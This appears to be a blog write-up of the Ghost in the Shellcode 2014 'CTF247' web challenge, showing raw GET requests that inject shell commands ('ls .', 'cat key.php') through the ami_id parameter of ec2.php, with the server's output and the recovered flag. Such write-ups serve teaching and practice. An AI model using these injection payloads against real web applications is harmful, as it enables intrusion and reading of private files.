In this short writeup I’m going to explain how I solved the Ghost in the Shellcode 2014 “CTF247” game hosted in GitS 2014.

After having reviewed the source code of the website’s index, the only section of the web that seems interesting and potential candidate where the key could be stored was TheFortress. For this reason I analyzed in detail this part.

The following GET petition corresponds the action Create Server using the form.

GET /ec2.php?utf8=%E2%9C%93&ami_id=ami-4be3d522&virtual_machine%5Bhost%5D=OGT&virtual_machine%5Bimage_id%5D=0&commit=Create+Server HTTP/1.1
Host: ctf247.2014.ghostintheshellcode.com

Testing all the parameters in order to discover web application vulnerabilities (it is a ctf web challenge) I realized that the parameter ami_id was vulnerable to injection of commands (command injection).

Below you can see how I inject the command "ls ." in the vulnerable parameter and how the server returns the list of files and directories of the actual path.

GET /ec2.php?utf8=%E2%9C%93&ami_id=ami-4be3d522;ls%20.&virtual_machine[host]=OGT&virtual_machine[image_id]=0&commit=Create+Server HTTP/1.1
Host: ctf247.2014.ghostintheshellcode.com
...
.:
total 32
drwxr-xr-x 4 0  4096 Jan 18 21:16 ec2-api-tools-1.6.12.0
-rw-r--r-- 1 0  2488 Jan 18 21:16 ec2.php
-rw-r--r-- 1 0 15675 Jan 18 21:16 index.html
drwxr-xr-x 3 0  4096 Jan 18 21:16 index\_files
-rw-r--r-- 1 0    85 Jan 18 21:16 key.php
<!DOCTYPE html>
<html>
...

Due the purpose of this challenge is to achieve the key, let’s try to get the content of the file key.php with the command "cat key.php;".

GET /ec2.php?utf8=%E2%9C%93&ami_id=ami-4be3d522;cat%20key.php;&virtual_machine[host]=OGT&virtual_machine[image_id]=0&commit=Create+Server HTTP/1.1
Host: ctf247.2014.ghostintheshellcode.com

In this case, the response doesn’t print the results of the command injection directly on the website because the contents of key.php are code in PHP. However the results are printed in the source code before the html code.

...
<?php
	/* flag{0aea26e968895efa40b563e3e8fe8f19} */
	echo('There is a key here.');
?>
<!DOCTYPE html>
<html>
...

Finally, as can be seen in the previous response, the flag of this challenge was 0aea26e968895efa40b563e3e8fe8f19.



Tags


blog comments powered by Disqus